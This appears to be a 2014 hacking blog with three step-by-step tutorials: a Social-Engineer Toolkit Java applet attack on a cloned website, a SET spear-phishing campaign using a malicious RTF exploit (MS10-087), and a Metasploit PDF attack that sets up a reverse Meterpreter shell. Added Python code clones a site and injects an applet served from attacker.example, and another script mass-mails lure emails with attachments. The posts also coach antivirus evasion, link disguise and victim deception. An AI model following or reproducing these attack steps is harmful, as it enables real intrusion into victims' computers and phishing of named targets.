Saturday, 24 May 2014

Web Attack Vectors with a Java Applet

The Java applet attack is one of the most successful attack vectors in SET and has one of the highest compromise rates. It is popular because the malicious Java applet is trivial to generate, SET can clone any site we want to carry the applet in seconds, and the applet runs wherever the Java browser plugin is installed, so it is not tied to one operating system. The only real difficulty is delivering the applet convincingly enough that the victim clicks Run.
The Java applet attack creates a malicious Java applet that, once run, completely compromises the victim's machine. The neat trick with SET is that it clones a website of your choice to host the applet and, once the victim has clicked Run, redirects them back to the original site, which makes the attack much more believable.

The Java applet attack vector affects any system running the Java browser plugin:

    Windows systems
    Linux systems
    Mac OS X

We open the Social-Engineer Toolkit and, from the main menu, choose Website Attack Vectors: select option 2 and press enter.

In the next menu we choose the first option, the Java Applet Attack Method:

In the next section we are offered three ways to build the landing page. We use the Site Cloner, which recreates a website of our choice and injects the malicious Java applet into the copy.

Next SET asks whether we are using NAT or port forwarding. Answer yes if the address the victim will connect back to (your public IP) differs from the address of the machine running SET; SET will then ask for both addresses.

Enter the URL of the site to clone and press enter. Here I am using www.hacxorprogramming.blogspot.in, but you can use any website whose visitors could plausibly be asked to run a Java applet.


The next step is to decide which payload will be used. SET offers a variety of payloads; here we chose a simple Windows Shell Reverse TCP:

The website is now cloned, but you are not done: the payload still has to get past anti-virus software for the attack to work. SET offers several encoding options for this; we chose the Backdoored Executable, which is usually the most reliable of them. How well any of these evade a given product varies, so test the result against the anti-virus your target actually runs before sending the link.


The next option is the port for the listener. Press enter to let SET choose the default, port 443, which is chosen because outbound HTTPS is allowed through almost every firewall.

Our next step is to hide our raw IP address so that the link looks legitimate. We can register a look-alike domain, or use an online URL-shortening service so the address is not visible in the link we send to the target. Note that a shortener only hides the address inside the message; once the page loads, the browser's address bar shows the real destination, so a registered domain is the more convincing option.


Note : If you had changed the configuration file to include WEBATTACK_EMAIL=ON, you
would have been prompted to send an email using the spear-phishing attack vector
(minus attachments).

Now that everything is set up, you simply need to get the target to browse to the malicious site. On reaching it, the target sees a Java security warning naming the applet's publisher. If the target clicks Run, and many users will, the payload executes and you gain full control of the user's system.


Now it is up to you to convince the victim to click the link. Once they do, they land on the cloned website and the Java warning pops up asking them to run the applet. If they click Run, back on the attacker machine the handler SET started reports the new session: a command shell here, since we chose Windows Shell Reverse TCP, or a Meterpreter session if you chose a Meterpreter payload.
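To make the cloning step concrete, here is what SET's Site Cloner does, reduced to its essentials. This is an added example written for this post, not SET's own code: it takes the fetched HTML of the target page, rewrites relative links to absolute URLs so the clone still renders when served from our host, and injects an `<applet>` tag before `</body>`. The page HTML, the applet class and jar names, the attacker URL and the `redirect` parameter are all constructed assumptions.

```python
"""Site cloning with applet injection, the mechanism SET's Site Cloner automates.

Added example. The HTML below is a constructed stand-in for a fetched page;
the applet class/jar names and the redirect parameter are assumptions.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin

# Constructed stand-in for the HTML we would fetch from the site being cloned.
ORIGINAL_URL = "https://www.example.com/login/"
ORIGINAL_HTML = """<!DOCTYPE html>
<html><head><title>Login</title>
<link rel="stylesheet" href="/static/site.css">
<script src="js/app.js"></script>
</head>
<body>
<img src="../logo.png" alt="logo">
<a href="/help">Help &amp; FAQ</a>
<form action="login.php" method="post"><input name="user"><input disabled></form>
</body></html>"""


class CloneRewriter(HTMLParser):
    """Stream the page back out, fixing up URLs and injecting the applet."""

    URL_ATTRS = {"href", "src", "action"}

    def __init__(self, base_url, applet_tag):
        super().__init__(convert_charrefs=False)  # keep entities as written
        self.base_url = base_url
        self.applet_tag = applet_tag
        self.out = []
        self.injected = False

    def _render_attrs(self, attrs):
        parts = []
        for name, value in attrs:
            if value is None:            # boolean attribute, e.g. <input disabled>
                parts.append(name)
                continue
            if name.lower() in self.URL_ATTRS:
                # Relative references would otherwise resolve against our host
                # and break the look of the clone (missing CSS, images, forms).
                value = urljoin(self.base_url, value)
            parts.append(f'{name}="{value}"')
        return (" " + " ".join(parts)) if parts else ""

    def handle_starttag(self, tag, attrs):
        self.out.append(f"<{tag}{self._render_attrs(attrs)}>")

    def handle_startendtag(self, tag, attrs):
        self.out.append(f"<{tag}{self._render_attrs(attrs)}/>")

    def handle_endtag(self, tag):
        if tag.lower() == "body" and not self.injected:
            self.out.append(self.applet_tag + "\n")   # inject once, before </body>
            self.injected = True
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(data)

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")

    def handle_comment(self, data):
        self.out.append(f"<!--{data}-->")

    def handle_decl(self, decl):
        self.out.append(f"<!{decl}>")


def applet_tag(jar_url, original_url):
    """Hypothetical applet tag: class and jar names are assumptions.
    The 'redirect' param is what our applet would read to send the victim
    back to the real site after it has run."""
    return (f'<applet code="Java.class" archive="{jar_url}" width="1" height="1">'
            f'<param name="redirect" value="{original_url}"></applet>')


def clone_page(original_url, html, jar_url):
    """Return the cloned HTML with absolute URLs and the applet injected."""
    rewriter = CloneRewriter(original_url, applet_tag(jar_url, original_url))
    rewriter.feed(html)
    rewriter.close()
    return "".join(rewriter.out)


if __name__ == "__main__":
    print(clone_page(ORIGINAL_URL, ORIGINAL_HTML, "http://attacker.example/Java.jar"))
```

The URL rewriting is the part that is easy to forget when cloning by hand: a page whose stylesheet and images fail to load looks wrong immediately, and the victim never gets as far as the Run prompt.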



Sunday, 11 May 2014

Social Engineer Toolkit (SET) tutorial for penetration testers!

Social engineering is the act of getting people to give you the information you seek, usually by gaining their trust. That trust may be gained by posing as someone in authority, a colleague, or just someone who needs help. The purpose of SET is to fill a gap in the penetration-testing community and bring awareness to social-engineering attacks. The toolkit attacks human weaknesses, exploiting curiosity, credibility, avarice, and simple carelessness. Social-engineering attacks are at an all-time high and have always been a large risk for many organizations.
The current version of the Social-Engineer Toolkit includes the following types of attacks:

Spear-phishing
Websites
Infectious Media Generator
SMS spoofing attack vector

Spear-Phishing Attack Vector:
The spear-phishing attack vector specially crafts file-format exploits (such as Adobe PDF exploits) and sends them to a target as email attachments which, when opened, compromise the target's machine. Ordinary phishing is sent to as many people as possible; a spear-phishing attack is similar, except that it targets one or a few specific individuals. In other words, it is a targeted social-engineering attack, hence the spear.

Let's now select number 1 from the main menu and begin our spear-phishing attack.
SET explains what a spear-phishing attack is and asks how we want to go about it. We can choose:

 set> 1

 The Spearphishing module allows you to specially craft email messages and send
 them to a large (or small) number of people with attached fileformat malicious
 payloads. If you want to spoof your email address, be sure "Sendmail" is in-
 stalled (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF
 flag to SENDMAIL=ON.

 There are two options, one is getting your feet wet and letting SET do
 everything for you (option 1), the second is to create your own FileFormat
 payload and use it in your own attack. Either way, good luck and enjoy!

   1) Perform a Mass Email Attack
   2) Create a FileFormat Payload
   3) Create a Social-Engineering Template

  99) Return to Main Menu

Let’s select a FileFormat attack. Type number 2 and press enter.

set:phishing>2

 Select the file format exploit you want.
 The default is the PDF embedded EXE.

           ********** PAYLOADS **********

   1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
   2) SET Custom Written Document UNC LM SMB Capture Attack
   3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
   4) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
   5) Adobe Flash Player "Button" Remote Code Execution
   6) Adobe CoolType SING Table "uniqueName" Overflow
   7) Adobe Flash Player "newfunction" Invalid Pointer Use
   8) Adobe Collab.collectEmailInfo Buffer Overflow
   9) Adobe Collab.getIcon Buffer Overflow
  10) Adobe JBIG2Decode Memory Corruption Exploit
  11) Adobe PDF Embedded EXE Social Engineering
  12) Adobe util.printf() Buffer Overflow
  13) Custom EXE to VBA (sent via RAR) (RAR required)
  14) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
  15) Adobe PDF Embedded EXE Social Engineering (NOJS)
  16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
  17) Apple QuickTime PICT PnSize Buffer Overflow
  18) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
  19) Adobe Reader u3D Memory Corruption Vulnerability
  20) MSCOMCTL ActiveX Buffer Overflow (ms12-027)



After we select the FileFormat attack, we are asked which exploit we want to use. Notice that the default is the
PDF with the embedded .exe. For this exercise, let's use the Microsoft Word RTF pFragments attack (MS10-087), option 4:

set:payloads>4



   1) Windows Reverse TCP Shell              Spawn a command shell on victim and send back to attacker
   2) Windows Meterpreter Reverse_TCP        Spawn a meterpreter shell on victim and send back to attacker
   3) Windows Reverse VNC DLL                Spawn a VNC server on victim and send back to attacker
   4) Windows Reverse TCP Shell (x64)        Windows X64 Command Shell, Reverse TCP Inline
   5) Windows Meterpreter Reverse_TCP (X64)  Connect back to the attacker (Windows x64), Meterpreter
   6) Windows Shell Bind_TCP (X64)           Execute payload and create an accepting port on remote system
   7) Windows Meterpreter Reverse HTTPS      Tunnel communication over HTTP using SSL and use Meterpreter



This builds a Word document that triggers a stack buffer overflow in the RTF parser and runs our payload on the victim's machine.
Now that we have chosen the file type, the next step is to decide which payload the document should run, which in turn decides the listener we need on our side.
We choose option 5, Windows Meterpreter Reverse_TCP (X64), and press enter.
Then enter the IP address for the payload listener and press enter.

If we want to trick the victim into opening the file, we should give it a name that sounds enticing or familiar to them.
This will differ depending on the victim, but in our scenario we are spearing a manager at a large company, so let's call it SalesReport, something he or she might actually be expecting in their email.

set:payloads>5
set> IP address for the payload listener: 192.168.121.128
set:payloads> Port to connect back on [443]:
[-] Defaulting to port 443...
[-] Generating fileformat exploit...
[*] Payload creation complete.
[*] All payloads get sent to the /root/.set/template.rtf directory
[-] As an added bonus, use the file-format creator in SET to create your attachment.

   Right now the attachment will be imported with filename of 'template.whatever'

   Do you want to rename the file?

   example Enter the new filename: moo.pdf

    1. Keep the filename, I don't care.
    2. Rename the file, I want to be cool.


Now that we have created the malicious file, we need to create the email. This is important: if the victim is to open the file, the email must look legitimate. SET asks whether we want to use a pre-defined template or a one-time-use email template. Let's be creative and choose a one-time-use email.

set:phishing>2
set:phishing> New filename:SalesReport
[*] Filename changed, moving on...

   Social Engineer Toolkit Mass E-Mailer

   There are two options on the mass e-mailer, the first would
   be to send an email to one individual person. The second option
   will allow you to import a list and send it to as many people as
   you want within that list.

   What do you want to do:

   1.  E-Mail Attack Single Email Address
   2.  E-Mail Attack Mass Mailer

   99. Return to main menu.
  
set:phishing>1

   Do you want to use a predefined template or craft
   a one time email template.

   1. Pre-Defined Template
   2. One-Time Use Email Template

set:phishing>2
set:phishing> Subject of the email:Report
set:phishing> Send the message as html or plain? 'h' or 'p' [p]:p
set:phishing> Enter the body of the message, hit return for a new line. Control+c when finished:This is report on sales. If you have any question, please feel free to ask
Next line of the body:
Next line of the body: Sincerely
Next line of the body:
Next line of the body: Your Rohit
Next line of the body: ^Cset:phishing> Send email to:victim'sEmailAdress@Here                      

  1. Use a gmail Account for your email attack.
  2. Use your own server or open relay

set:phishing>1
set:phishing> Your gmail email address:EnterYourEmail@Here
set:phishing> The FROM NAME user will see: :Rohit
Email password:
set:phishing> Flag this message/s as high priority? [yes|no]:y

Finally, SET creates a Metasploit listener for the payload to connect back to. When SET launches Metasploit, it configures all the necessary options and starts a handler listening on your attacking IP address on port 443, the port chosen above.
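The mail step above is entirely menu-driven, so here is the same thing done by hand in Python, as an added example that is not part of the original post or SET's own code. It builds the message exactly as the prompts describe it (From name, subject, plain or HTML body, attachment, optional high-priority flag), parses a recipient list for the mass-mailer option, and submits over authenticated SMTP with STARTTLS. The addresses, the SMTP server and the attachment bytes are constructed placeholders, and the priority headers are the conventional ones rather than a claim about what SET itself sets.

```python
"""The e-mail step of SET's spear-phishing module, done by hand.

Added example. Addresses, server and attachment contents are constructed
placeholders; the priority headers are the conventional ones.
"""
import smtplib
from email.message import EmailMessage
from email.utils import formataddr

# Constructed stand-in for the SalesReport.rtf that SET generated above.
ATTACHMENT_BYTES = b"{\\rtf1\\ansi Constructed sample, not a real exploit document}"
ATTACHMENT_NAME = "SalesReport.rtf"
# Constructed recipient file in the shape the mass mailer imports.
TARGET_LIST = """# one recipient per line, '#' lines and blanks ignored
manager@target.example
  finance@target.example

# duplicates are collapsed
manager@target.example
"""


def load_targets(text):
    """Parse a recipient file into a de-duplicated, ordered list of addresses."""
    seen, targets = set(), []
    for line in text.splitlines():
        addr = line.strip()
        if not addr or addr.startswith("#") or addr in seen:
            continue
        seen.add(addr)
        targets.append(addr)
    return targets


def build_message(from_name, from_addr, to_addr, subject, body,
                  html=False, attachment=None, attachment_name=None,
                  high_priority=False):
    """Assemble the phishing e-mail as the SET prompts describe it."""
    msg = EmailMessage()
    msg["From"] = formataddr((from_name, from_addr))   # e.g. "Rohit <addr>"
    msg["To"] = to_addr
    msg["Subject"] = subject
    if high_priority:
        # Conventional headers that make mail clients show the "!" flag.
        msg["X-Priority"] = "1"
        msg["Importance"] = "High"
    msg.set_content(body, subtype="html" if html else "plain")   # 'h' or 'p'
    if attachment is not None:
        msg.add_attachment(attachment, maintype="application",
                           subtype="octet-stream", filename=attachment_name)
    return msg


def build_campaign(targets, **kwargs):
    """One message per recipient, so each target sees only their own address."""
    return [build_message(to_addr=addr, **kwargs) for addr in targets]


def send_messages(messages, host, port, username, password):
    """Submit each message over SMTP with STARTTLS (the Gmail-style option)."""
    with smtplib.SMTP(host, port) as smtp:
        smtp.starttls()
        smtp.login(username, password)
        for msg in messages:
            smtp.send_message(msg)


if __name__ == "__main__":
    body = ("This is the report on sales. If you have any question, "
            "please feel free to ask.\n\nSincerely\nRohit")
    msgs = build_campaign(load_targets(TARGET_LIST), from_name="Rohit",
                          from_addr="sender@example.com", subject="Report",
                          body=body, attachment=ATTACHMENT_BYTES,
                          attachment_name=ATTACHMENT_NAME, high_priority=True)
    print(msgs[0])
    # send_messages(msgs, "smtp.example.com", 587, "sender@example.com", "password")
```

Sending one message per recipient, rather than one message with everyone in To:, is what keeps a mass mailing from looking like a mass mailing; it also means a bounce or a reply from one target reveals nothing about the others.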

Thursday, 1 May 2014

File Format Exploit !

File format exploits target vulnerabilities in the application that parses a given file type, such as Adobe Reader parsing a PDF document. This class of exploit relies on a user actually opening a malicious file in the vulnerable application. Malicious files can be hosted remotely or sent via email.
In this tutorial I will demonstrate a client-side attack using Metasploit's Adobe PDF Embedded EXE module (adobe_pdf_embedded_exe_nojs), which embeds an executable in a PDF and uses Reader's Launch action to run it when the victim accepts the prompt. Adobe Reader is installed on a very large share of Windows desktops, which is what makes PDF-based attacks so broadly applicable.

The first step is to create the malicious PDF with Metasploit:

msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
msf exploit(adobe_pdf_embedded_exe_nojs) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(adobe_pdf_embedded_exe_nojs) > set FILENAME Important_Meeting_Notice.pdf
msf exploit(adobe_pdf_embedded_exe_nojs) > set LHOST 192.168.8.92
msf exploit(adobe_pdf_embedded_exe_nojs) > set LPORT 443
msf exploit(adobe_pdf_embedded_exe_nojs) > exploit

The next step is to send the malicious PDF to the target's e-mail address.

After sending the malicious PDF we need a listener to catch the reverse connection. We use multi/handler in msfconsole, with the same payload, LHOST and LPORT as the PDF was built with, so that when the payload runs on the target the connection back reaches our machine.

msf exploit(adobe_pdf_embedded_exe_nojs ) > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.8.92
LHOST => 192.168.8.92
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.8.92:443
[*] Starting the payload handler...
msf exploit(handler) >

When the victim opens the malicious PDF, Reader shows a Launch warning whose text (crafted by the module) tells the victim to tick "do not show this message again" and
click Open. Once the victim clicks Open, the embedded executable runs and our listener catches the reverse connection.

We have successfully exploited a file format weakness by creating a malicious document with Metasploit and sending it to our targeted user.
As a penetration tester, every bit of information can be used to craft an even better attack. Browser exploits and file format exploits are typically very effective, provided you do your homework on which software the target runs.